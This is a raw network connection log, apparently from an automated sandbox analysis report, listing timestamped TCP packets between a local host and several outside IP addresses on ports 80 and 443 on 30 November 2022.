Nov 30, 2022 00:22:20.529952049 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.530097008 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.530153036 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.530186892 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.530236959 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.530329943 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.530384064 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.530745029 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.530886889 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.530975103 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.531033039 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.531121016 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.531191111 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.531255960 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.531316996 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.531408072 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.531456947 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.531538963 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.531594992 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.531948090 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.532017946 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.532059908 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.532087088 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.532139063 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.532195091 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.532242060 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.532278061 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.532329082 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.532388926 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.532388926 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.532442093 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.532497883 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.532525063 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.532579899 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.532604933 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.532664061 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.532679081 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.532725096 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.532764912 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.532833099 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.532850027 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.532891989 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.532932997 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.532984972 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.533019066 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.533072948 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.533108950 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.533169031 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.533201933 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.533260107 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.533292055 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.533349991 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.533382893 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.533437014 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.533483028 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.533551931 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.533574104 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.533612013 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.533672094 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.533740044 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.533761978 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.533792019 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.533859015 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.533915997 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.533952951 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.534002066 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.534043074 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.534094095 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.534143925 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.534198999 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.534235954 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.534271002 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.534286976 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.534313917 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.837996006 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.838068962 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.838124037 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.838196039 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.838227987 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.838280916 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.838325024 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.838349104 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.838383913 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.838409901 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.838458061 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.838493109 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.838536978 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.838556051 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.838582039 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.838701010 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.838804960 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.838829041 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.838870049 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.838908911 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.838959932 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.839128971 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.839174986 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.839211941 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.839231014 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.839257956 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.839301109 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.839325905 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.839359045 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.839401007 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.839445114 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.839463949 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.839498997 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.839570999 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.839654922 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.839719057 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.839767933 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.839821100 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.839839935 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.839946032 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.840013027 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.840045929 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.840097904 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.840111971 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.840162992 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.840296030 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.840349913 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.840395927 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.840471029 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.840502977 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.840528011 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.840593100 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.840634108 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:20.840652943 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:20.840682030 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.121395111 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.121494055 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.121577024 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.121577024 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.121639967 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.121695995 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.121740103 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.121798038 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.121829033 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.121897936 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.121923923 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.121948004 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.122009993 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.122065067 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.122091055 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.122145891 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.122175932 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.122236013 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.122262955 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.122314930 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.122351885 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.122407913 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.122450113 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.122509956 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.122554064 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.122579098 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.122754097 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.122818947 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.122848034 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.122917891 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.122976065 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.123053074 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.123070955 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.123106956 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.123157024 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.123204947 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.123236895 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:21.123327017 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.175982952 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:21.470655918 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:25.601241112 CET	49706	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:25.892831087 CET	80	49706	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:25.893117905 CET	49706	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:26.085731030 CET	49706	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:26.576812029 CET	80	49706	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:27.387768030 CET	80	49706	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:27.387814045 CET	80	49706	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:27.387866974 CET	49706	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:27.387958050 CET	49706	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:27.680780888 CET	80	49706	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:27.680824995 CET	80	49706	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:27.680851936 CET	80	49706	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:27.680877924 CET	80	49706	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:27.680938005 CET	49706	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:27.680969000 CET	49706	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:27.973778009 CET	80	49706	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:27.973812103 CET	80	49706	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:27.973867893 CET	49706	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:27.973893881 CET	49706	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:27.974196911 CET	49706	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:28.266635895 CET	80	49706	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:30.383904934 CET	49707	443	192.168.2.5	149.154.167.99
Nov 30, 2022 00:22:30.383996010 CET	443	49707	149.154.167.99	192.168.2.5
Nov 30, 2022 00:22:30.384114981 CET	49707	443	192.168.2.5	149.154.167.99
Nov 30, 2022 00:22:30.548091888 CET	49707	443	192.168.2.5	149.154.167.99
Nov 30, 2022 00:22:30.548156023 CET	443	49707	149.154.167.99	192.168.2.5
Nov 30, 2022 00:22:30.624341011 CET	443	49707	149.154.167.99	192.168.2.5
Nov 30, 2022 00:22:30.624542952 CET	49707	443	192.168.2.5	149.154.167.99
Nov 30, 2022 00:22:30.992780924 CET	49709	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:30.992846012 CET	443	49709	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:30.993001938 CET	49709	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:31.035454035 CET	49709	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:31.035502911 CET	443	49709	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:31.107533932 CET	443	49709	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:31.107635021 CET	49709	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:31.119657040 CET	49709	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:31.119703054 CET	443	49709	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:31.120192051 CET	443	49709	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:31.120275021 CET	49709	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:31.137914896 CET	49709	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:31.137936115 CET	443	49709	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:31.157258987 CET	49707	443	192.168.2.5	149.154.167.99
Nov 30, 2022 00:22:31.157318115 CET	443	49707	149.154.167.99	192.168.2.5
Nov 30, 2022 00:22:31.158406973 CET	443	49707	149.154.167.99	192.168.2.5
Nov 30, 2022 00:22:31.158605099 CET	49707	443	192.168.2.5	149.154.167.99
Nov 30, 2022 00:22:31.161686897 CET	49707	443	192.168.2.5	149.154.167.99
Nov 30, 2022 00:22:31.161725998 CET	443	49707	149.154.167.99	192.168.2.5
Nov 30, 2022 00:22:31.177875042 CET	443	49709	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:31.178000927 CET	443	49709	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:31.178152084 CET	49709	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:31.182013035 CET	49709	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:31.182049036 CET	443	49709	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:31.195446014 CET	443	49707	149.154.167.99	192.168.2.5
Nov 30, 2022 00:22:31.195475101 CET	443	49707	149.154.167.99	192.168.2.5
Nov 30, 2022 00:22:31.195544004 CET	443	49707	149.154.167.99	192.168.2.5
Nov 30, 2022 00:22:31.195571899 CET	443	49707	149.154.167.99	192.168.2.5
Nov 30, 2022 00:22:31.195676088 CET	49707	443	192.168.2.5	149.154.167.99
Nov 30, 2022 00:22:31.195677042 CET	49707	443	192.168.2.5	149.154.167.99
Nov 30, 2022 00:22:31.317717075 CET	49707	443	192.168.2.5	149.154.167.99
Nov 30, 2022 00:22:31.317790031 CET	443	49707	149.154.167.99	192.168.2.5
Nov 30, 2022 00:22:31.330949068 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.372775078 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.373423100 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.389978886 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.428236961 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.535934925 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.537287951 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.541434050 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.579993010 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.580096960 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.580159903 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.580229044 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.580259085 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.580302000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.580302954 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.580358028 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.580390930 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.580449104 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.580461979 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.580513000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.580532074 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.580602884 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.580650091 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.580672026 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.580724001 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.580769062 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.580967903 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619200945 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619246006 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619276047 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619299889 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619326115 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619352102 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619375944 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619385958 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619402885 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619431973 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619448900 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619455099 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619468927 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619484901 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619491100 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619513035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619520903 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619539022 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619545937 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619566917 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619566917 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619585991 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619597912 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619610071 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619625092 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619642973 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619652987 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619671106 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619678974 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619699001 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619708061 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619724989 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619736910 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.619755983 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.619782925 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.657936096 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.657979965 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658004999 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658019066 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658034086 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658057928 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658058882 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658057928 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658081055 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658092022 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658107996 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658107996 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658123016 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658137083 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658148050 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658169031 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658185959 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658193111 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658214092 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658216000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658232927 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658242941 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658267021 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658268929 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658279896 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658298016 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658313990 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658320904 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658339977 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658346891 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658360004 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658365965 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658380032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658399105 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658407927 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658407927 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658418894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658421993 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658440113 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658441067 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658458948 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658462048 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658478022 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658478975 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658499002 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658503056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658519030 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658519983 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658535957 CET	80	49710	88.198.94.71	192.168.2.5
